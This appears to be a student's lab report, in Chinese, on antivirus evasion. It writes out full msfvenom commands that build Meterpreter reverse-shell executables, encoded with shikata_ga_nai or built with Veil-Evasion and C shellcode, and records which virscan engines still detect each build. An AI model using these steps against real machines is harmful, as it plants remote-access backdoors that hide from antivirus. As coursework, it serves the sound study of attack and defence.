20145316許心遠《網絡攻防》第三次實驗：免殺原理與實踐

基礎問題回答

殺軟是如何檢測出惡意代碼的？

• 基於特徵碼的檢測
• 啓發式惡意軟件檢測

• 基於行爲的惡意軟件檢測

  免殺是作什麼？

• 免殺即「反-反病毒」/「反殺毒技術」，在這個實驗中可讓安插的後門不被AV軟件發現。

  免殺的基本方法有哪些？

• 改變特徵碼
  • 若是你手裏只有EXE
    • 加殼：壓縮殼 加密殼
  • 有shellcode(像Meterpreter）
    • 用encode進行編碼
    • 基於payload從新編譯生成可執行文件
  • 有源代碼
    • 用其餘語言進行重寫再編譯（veil-evasion）
• 改變行爲
  • 通信方式
    • 儘可能使用反彈式鏈接
    • 使用隧道技術
    • 加密通信數據
  • 操做模式
    • 基於內存操做
    • 減小對系統的修改
    • 加入混淆做用的正常功能代碼

實踐總結與體會

• 本次實踐是十分有趣，一直以來我都十分信任本身的殺軟，我會隔一段時間就用殺軟對個人電腦進行一次全面檢測查殺，本覺得這樣的好習慣能夠保證絕對的安全，事實證實，naive。

• 經過virscan平臺的幾回實驗，對各種殺毒軟件的靠譜性有了大體的瞭解（雖然可能一些殺軟由於運氣很差被我冤枉了），總的來說，好像外國的殺軟更好用一點啊？咱們平日裏解除的某衛士、某星、某毒霸令我失望。

  離實戰還缺些什麼技術或步驟

• 靶機要乖乖關閉防火牆開放端口等我把後門種進去，這一般是不現實的，防火牆關閉電腦會一直提醒你打開。
• 殺軟的病毒庫都是在一直更新的，咱們現階段所知道的方式能作出來的免殺，大公司早就想到了，一有出現當即更新。

• IP地址會有更新。

  實踐過程記錄

  msfvenom直接生成meterpreter可執行文件

• 個人主機（win10）ip
  
• 虛擬機kali的ip
  
• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=任意 -f exe > met.exe生成meterpreter可執行文件
  
• 靶機打開端口監聽
  
• 使用ncat傳輸到主機（上次實踐的方式）
  
• 前提：關閉殺軟（不然回即時清除）
  
• 傳輸成功
  
• 到www.virscan.org上檢測多少殺軟能夠把它查殺出來
  

• 畢竟是簡單惡意軟件，能夠看出來，仍是不少殺軟發現有病毒的。

  Msfvenom使用編碼器生成meterpreter可執行文件

  編碼一次

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met1.exe生成編碼一次的可執行文件
  
• 發到主機，再次檢測
  

• 好像能查殺出來的AV稍微少了點哦，不過進步不明顯，仍是要努力啊。

  編碼十次

• 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met2.exe
  
• 發到主機，檢測（糟糕啊，寫博客發現忘記截圖了！）

• 算了，你們知道就好，咱們的惡意軟件依然沒有多大進步，看來AV對這種軟件的抵抗度很高，畢竟西方哪個國家我沒有去過~

  使用Veil-Evasion生成可執行文件

• 在kali終端直接輸入veil-evasion進入ve界面，輸入use python/meterpreter/rev_tcp
  
• 使用set LHOST和set LPORT命令，都設爲kali的，成功界面以下：
  
• 最終生成的可執行文件在這個目錄下/var/lib/veil-evasion/output/compiled/，你們進去本身找一下
  
• 傳送到主機，檢測結果
  

• 已經有很大的進步啦，這種方式效果不錯

  使用C語言調用Shellcode

• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=任意 -f c生成一個C語言數組
  
• 利用這個數組在主機的vs平臺下寫shellcode（感謝高其同窗提供源代碼供我複製粘貼~）
  
• 編譯成爲可執行文件
  
• kali端進行msf監聽（上節課內容）
  
• 獲取主機權限
  
• 檢測結果
  

• 很厲害啊，只有幾個殺軟能殺出來了